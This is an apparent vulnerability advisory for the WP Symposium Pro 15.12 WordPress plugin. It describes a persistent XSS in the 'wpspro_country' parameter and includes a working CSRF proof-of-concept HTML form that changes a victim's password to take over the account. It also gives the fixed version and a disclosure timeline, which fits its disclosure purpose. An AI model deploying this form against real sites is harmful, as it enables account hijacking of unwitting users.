WordPress Symposium Pro Social 15.12 XSS / CSRF
Posted on 08 January 2016
#Product : WP Symposium Pro Social Network plugin #Exploit Author : Rahul Pratap Singh #Home page Link : https://wordpress.org/plugins/wp-symposium-pro #Version : 15.12 #Website : 0x62626262.wordpress.com #Twitter : @0x62626262 #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94 #Date : 8/Jan/2016 1) XSS Vulnerability: Vulnerable Code: file: wps_usermeta_shortcodes.php "wpspro_country" parameter is not sanitized, that leads to persistent xss. Video Demonstration: https://www.youtube.com/watch?v=Xglc3rNZPXs 2) CSRF Vulnerability: Description: Edit profile page is vulnerable to CSRF, that allows to change password which in turn leads to full account takeover. Exploit: <html> <body> <form action="http://localhost/wp422/wordpress/index.php/edit-profile/" method="POST" enctype="multipart/form-data"> <input type="hidden" name="wps_usermeta_change_update" value="yes" /> <input type="hidden" name="wpspro_display_name" value="rahul" /> <input type="hidden" name="wpspro_firstname" value="hello1" /> <input type="hidden" name="wpspro_lastname" value="hello2" /> <input type="hidden" name="wpspro_email" value=" " /> <input type="hidden" name="wpsro_home" value="hello4" /> <input type="hidden" name="wpspro_country" value="hello5" /> <input type="hidden" name="wpspro_password" value="asdf" /> <input type="hidden" name="wpspro_password2" value="asdf" /> <input type="submit" value="Submit request" /> </form> </body> </html> Video Demonstration: https://www.youtube.com/watch?v=sN65HlCRe9c Fix: Update to version 16.1 Disclosure Timeline: reported to vendor : 6/1/2016 vendor response : 6/1/2016 vendor acknowledged : 6/1/2016 vendor scheduled a patch: 7/1/2016 CVE Number : Not assigned yet
